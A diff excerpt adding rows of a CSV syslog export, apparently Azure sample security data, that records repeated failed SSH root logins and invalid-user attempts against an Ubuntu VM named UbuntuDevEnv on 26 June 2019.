+13505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 9373: Too many authentication failures [preauth],130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,9373,,
+13508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:20,UbuntuDevEnv,2019-06-26 04:41:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 9373 ssh2 [preauth],130217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,9373,,
+13509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:22,UbuntuDevEnv,2019-06-26 04:41:21,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak1 from 95.216.195.95 port 36764 ssh2,130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak1,95.216.195.9,36764,,
+13510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:22,UbuntuDevEnv,2019-06-26 04:41:21,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 36764:11: Bye Bye [preauth],130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,36764,,
+13511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:22,UbuntuDevEnv,2019-06-26 04:41:21,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak1 95.216.195.95 port 36764 [preauth],130297,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak1,95.216.195.9,36764,,
+13512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:23,UbuntuDevEnv,2019-06-26 04:41:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:25,UbuntuDevEnv,2019-06-26 04:41:24,auth,UbuntuDevEnv,info,Invalid user forum from 177.23.90.10 port 33080,130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forum,177.23.90.1,33080,,
+13514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:25,UbuntuDevEnv,2019-06-26 04:41:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:25,UbuntuDevEnv,2019-06-26 04:41:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:25,UbuntuDevEnv,2019-06-26 04:41:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15305 ssh2,130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15305,,
+13517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:26,UbuntuDevEnv,2019-06-26 04:41:26,auth,UbuntuDevEnv,info,Failed password for invalid user forum from 177.23.90.10 port 33080 ssh2,130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forum,177.23.90.1,33080,,
+13518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:27,UbuntuDevEnv,2019-06-26 04:41:26,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 33080:11: Bye Bye [preauth],130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,33080,,
+13519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:27,UbuntuDevEnv,2019-06-26 04:41:26,auth,UbuntuDevEnv,info,Disconnected from invalid user forum 177.23.90.10 port 33080 [preauth],130309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forum,177.23.90.1,33080,,
+13520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:29,UbuntuDevEnv,2019-06-26 04:41:28,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15305 ssh2,130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15305,,
+13521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:41,UbuntuDevEnv,2019-06-26 04:41:40,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:41,UbuntuDevEnv,2019-06-26 04:41:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 15305 ssh2 [preauth],130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15305,,
+13523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:41,UbuntuDevEnv,2019-06-26 04:41:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:41,UbuntuDevEnv,2019-06-26 04:41:40,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 15305: Too many authentication failures [preauth],130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,15305,,
+13525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:41,UbuntuDevEnv,2019-06-26 04:41:40,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 15305 ssh2],130303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15305,,
+13526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:44,UbuntuDevEnv,2019-06-26 04:41:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:41:45,UbuntuDevEnv,2019-06-26 04:41:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 21480 ssh2,130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21480,,
+13528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:00,UbuntuDevEnv,2019-06-26 04:42:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 21480: Too many authentication failures [preauth],130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,21480,,
+13529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:00,UbuntuDevEnv,2019-06-26 04:42:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 21480 ssh2 [preauth],130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21480,,
+13530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:00,UbuntuDevEnv,2019-06-26 04:42:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 21480 ssh2],130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21480,,
+13531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:00,UbuntuDevEnv,2019-06-26 04:42:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:00,UbuntuDevEnv,2019-06-26 04:42:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:03,UbuntuDevEnv,2019-06-26 04:42:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:05,UbuntuDevEnv,2019-06-26 04:42:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27359 ssh2,130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27359,,
+13535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:17,UbuntuDevEnv,2019-06-26 04:42:17,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 27359 ssh2],130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27359,,
+13536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:17,UbuntuDevEnv,2019-06-26 04:42:17,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 51305:11: Bye Bye [preauth],130478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,51305,,
+13537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:17,UbuntuDevEnv,2019-06-26 04:42:17,auth,UbuntuDevEnv,info,Disconnected from 119.123.240.8 port 51305 [preauth],130478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,51305,,
+13538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:20,UbuntuDevEnv,2019-06-26 04:42:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 27359: Too many authentication failures [preauth],130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,27359,,
+13539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:20,UbuntuDevEnv,2019-06-26 04:42:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 27359 ssh2 [preauth],130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27359,,
+13540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:20,UbuntuDevEnv,2019-06-26 04:42:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27359 ssh2,130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27359,,
+13541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:20,UbuntuDevEnv,2019-06-26 04:42:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:20,UbuntuDevEnv,2019-06-26 04:42:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:23,UbuntuDevEnv,2019-06-26 04:42:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:25,UbuntuDevEnv,2019-06-26 04:42:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 33544 ssh2,130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33544,,
+13545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:40,UbuntuDevEnv,2019-06-26 04:42:39,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 33544 ssh2],130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33544,,
+13546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:40,UbuntuDevEnv,2019-06-26 04:42:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:40,UbuntuDevEnv,2019-06-26 04:42:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 33544: Too many authentication failures [preauth],130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,33544,,
+13548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:40,UbuntuDevEnv,2019-06-26 04:42:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 33544 ssh2 [preauth],130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,33544,,
+13549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:40,UbuntuDevEnv,2019-06-26 04:42:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130527,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:43,UbuntuDevEnv,2019-06-26 04:42:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:44,UbuntuDevEnv,2019-06-26 04:42:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:45,UbuntuDevEnv,2019-06-26 04:42:44,auth,UbuntuDevEnv,info,Invalid user pisica from 5.135.161.72 port 57654,130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pisica,5.135.161.7,57654,,
+13553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:45,UbuntuDevEnv,2019-06-26 04:42:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:45,UbuntuDevEnv,2019-06-26 04:42:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:47,UbuntuDevEnv,2019-06-26 04:42:47,auth,UbuntuDevEnv,info,Failed password for invalid user pisica from 5.135.161.72 port 57654 ssh2,130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pisica,5.135.161.7,57654,,
+13556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:47,UbuntuDevEnv,2019-06-26 04:42:47,auth,UbuntuDevEnv,info,Disconnected from invalid user pisica 5.135.161.72 port 57654 [preauth],130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pisica,5.135.161.7,57654,,
+13557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:47,UbuntuDevEnv,2019-06-26 04:42:47,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 57654:11: Bye Bye [preauth],130609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,57654,,
+13558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:48,UbuntuDevEnv,2019-06-26 04:42:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:52,UbuntuDevEnv,2019-06-26 04:42:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95  user=test,130635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,95.216.195.9,,0,
+13560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:52,UbuntuDevEnv,2019-06-26 04:42:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:53,UbuntuDevEnv,2019-06-26 04:42:53,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:54,UbuntuDevEnv,2019-06-26 04:42:53,auth,UbuntuDevEnv,info,Failed password for test from 95.216.195.95 port 54680 ssh2,130635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,54680,,
+13563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:54,UbuntuDevEnv,2019-06-26 04:42:54,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 54680:11: Bye Bye [preauth],130635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,54680,,
